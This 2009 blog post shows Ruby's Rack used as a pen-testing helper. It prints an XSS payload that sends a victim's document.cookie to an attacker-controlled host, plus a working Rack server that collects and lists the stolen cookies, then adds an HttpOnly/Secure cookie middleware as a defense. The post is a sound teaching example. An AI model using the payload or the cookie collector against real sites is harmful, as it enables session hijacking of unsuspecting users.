Rack for Pen Testing


One of the many things I got introduced to at Scotland on Rails was the Rack project. Designed to make web application deployment more flexible, it provides a common interface between web servers and Ruby web application frameworks (Rails, Sinatra, etc.).

Reading some of the examples, it occurred to me that Rack could be pretty handy for web application testing, where it's sometimes useful to have a minimal web application to bounce things off.

One example of this is demonstrating XSS attacks. A standard XSS attack is cookie stealing: the attacker injects a script that sends the victim's browser to a URL the attacker controls, with the victim site's cookie appended as a parameter of that URL.

So, for example, if we've found an XSS vector we can put

<script>document.location="http://<attacker_ip>/cookiegrabber?cookie="+document.cookie</script>

into the vulnerable page, and if we have a server listening on that IP address we get the cookie.

Here's where Rack comes in. You can use it to very quickly write some code that listens on a port and accepts the incoming request (and indeed does anything else you can do with Ruby, but hey, let's start small).

A proof-of-concept script to do something like this might look like the one below:

#!/usr/bin/env ruby
require 'rubygems'
require 'rack'

# Cookies captured so far, as [ip, cookie] pairs. A local captured by the
# closures below rather than a class variable, which Ruby no longer allows
# to be set from the top level.
grabbed = []

builder = Rack::Builder.new do
  use Rack::CommonLogger

  map '/' do
    # Rack bodies must respond to #each, so wrap the string in an array
    run Proc.new { |env| [200, {"Content-Type" => "text/html"}, ["<h1> Rack Pen Test Helper</h1>"]] }
  end

  map '/cookiegrabber' do
    app = proc do |env|
      req = Rack::Request.new(env)
      ip = req.ip.to_s
      cookie = req.params['cookie'] || "No Cookie Parameter passed"
      grabbed << [ip, cookie]
      # escape what came in, so the helper itself cannot be used for XSS
      safe = Rack::Utils.escape_html(cookie)
      [200, {"Content-Type" => "text/html"},
       ["grabbed " + safe + " from " + ip + "<br /> Grabbed " + grabbed.length.to_s + " cookies so far"]]
    end
    run app
  end

  map '/cookiegrabbed' do
    app = proc do |env|
      out = ""
      if grabbed.length > 0
        grabbed.each do |crumb|
          out << "Grabbed a cookie with value  " + Rack::Utils.escape_html(crumb[1]) + " from " + crumb[0] + "<br />"
        end
      else
        out = "Nothing Grabbed so far"
      end
      [200, {"Content-Type" => "text/html"}, [out]]
    end
    run app
  end
end

# The original used Rack::Handler::Mongrel; WEBrick ships with Rack 1.x/2.x.
Rack::Handler::WEBrick.run builder, :Port => 9292
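As an added example (not from the original post), here is the defender's side of the same demo: the cookie theft above only works because document.cookie can read the session cookie, and a Rack middleware that stamps HttpOnly (and Secure) on every Set-Cookie the application emits closes that off. It is written against the bare Rack call(env) contract so it runs without the rack gem; the EnsureHttpOnlyCookies class, LEAKY_APP and hardened_set_cookie are names assumed for this illustration.

```ruby
# Rack middleware that adds HttpOnly (and Secure) to every Set-Cookie the
# wrapped app emits. Written against the plain Rack protocol (an object whose
# #call(env) returns [status, headers, body]) so it runs without the rack gem.
class EnsureHttpOnlyCookies
  def initialize(app, secure: true)
    @app = app
    @secure = secure
  end

  def call(env)
    status, headers, body = @app.call(env)
    headers = headers.dup
    key = headers.keys.find { |k| k.to_s.casecmp('set-cookie').zero? }
    headers[key] = harden(headers[key]) if key
    [status, headers, body]
  end

  private

  # Rack 1.x/2.x join several cookies with "\n"; Rack 3 passes an Array.
  def harden(value)
    cookies = value.is_a?(Array) ? value : value.to_s.split("\n")
    hardened = cookies.map { |c| harden_one(c) }
    value.is_a?(Array) ? hardened : hardened.join("\n")
  end

  # Append HttpOnly (blocks document.cookie) and Secure (HTTPS only) if absent.
  def harden_one(cookie)
    attrs = cookie.split(';').map(&:strip)
    attrs << 'HttpOnly' unless attrs.any? { |a| a.casecmp('httponly').zero? }
    attrs << 'Secure' if @secure && attrs.none? { |a| a.casecmp('secure').zero? }
    attrs.join('; ')
  end
end

# Constructed stand-in for a vulnerable app: it sets its session cookie with no
# flags, which is exactly what the cookiegrabber payload above relies on.
LEAKY_APP = lambda do |_env|
  [200, { 'Content-Type' => 'text/html',
          'Set-Cookie' => "session=abc123; path=/\ntheme=dark; path=/" },
   ['<h1>victim</h1>']]
end

# Returns the Set-Cookie header as the browser would now receive it.
def hardened_set_cookie(app = LEAKY_APP)
  _status, headers, _body = EnsureHttpOnlyCookies.new(app).call({})
  headers['Set-Cookie']
end
puts hardened_set_cookie if $PROGRAM_NAME == __FILE__
```

With the middleware in place the injected script still runs, but document.cookie no longer contains the session value, so the cookiegrabber endpoint receives nothing useful.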

About this Entry

This page contains a single entry by Rory2 published on March 31, 2009 8:37 PM.
